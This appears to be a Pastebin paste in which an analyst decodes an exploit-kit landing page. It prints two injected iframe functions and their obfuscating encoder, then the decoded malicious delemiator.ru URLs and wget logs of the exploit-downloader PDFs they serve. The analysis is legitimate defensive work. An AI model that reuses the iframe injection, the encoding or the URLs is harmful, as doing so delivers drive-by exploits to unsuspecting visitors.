Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // There are 2(two) functions of PDF downloader, p1() & p2()
- // let's fetch the mess...
- function p1()
- {
- var d=document.createElement("div");
- d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
- document.body.appendChild(d);
- }
- function p2()
- {
- var d=document.createElement("div");
- d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
- document.body.appendChild(d);
- }
- // we have 2 IFRAME ↑here linked to formation url with the function x in PluginDetect,
- //let's feed the logic above into "c833f", "occ", "c" to get the desired values,
- // in this case like "30:1n:1i:1i:33", "3c:30:30" and "30"
- // PS: in the end it asked the PDF version, use your desirable vaues i.e the above
- // pdfver=[5,0,1,0] will be burped into string "5.0.1.0", put this into x to be burped as 1k:1d:1f:1d:1g:1d:1f
- //
- //Note, my memo code:
- a=x("occ"); // rephrase this val with "c833f" or "5.0.1.0"
- function x(s)
- { d=[];
- for(i=0;i<s.length;i++)
- { k=(s.charCodeAt(i)).toString(33);
- d.push(k); };
- return d.join(":"); } eval(a);
- // shortly, let's rephrase the url into all cracked strings, to get the download url below:
- http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
- http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
- // the PoC of this theory is as per downloaded exploit-downloader PDF below:
- --17:14:11-- http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
- => `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
- Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
- Connecting to delemiator.ru|202.180.221.186|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 27,836 (27K) [application/pdf]
- 17:14:16 (16.21 KB/s) - `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [27836/27836]
- --17:16:32-- http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
- => `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
- Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
- Connecting to delemiator.ru|203.80.16.81|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 14,769 (14K) [application/pdf]
- 17:16:35 (66.79 KB/s) - `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [14769/14769]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement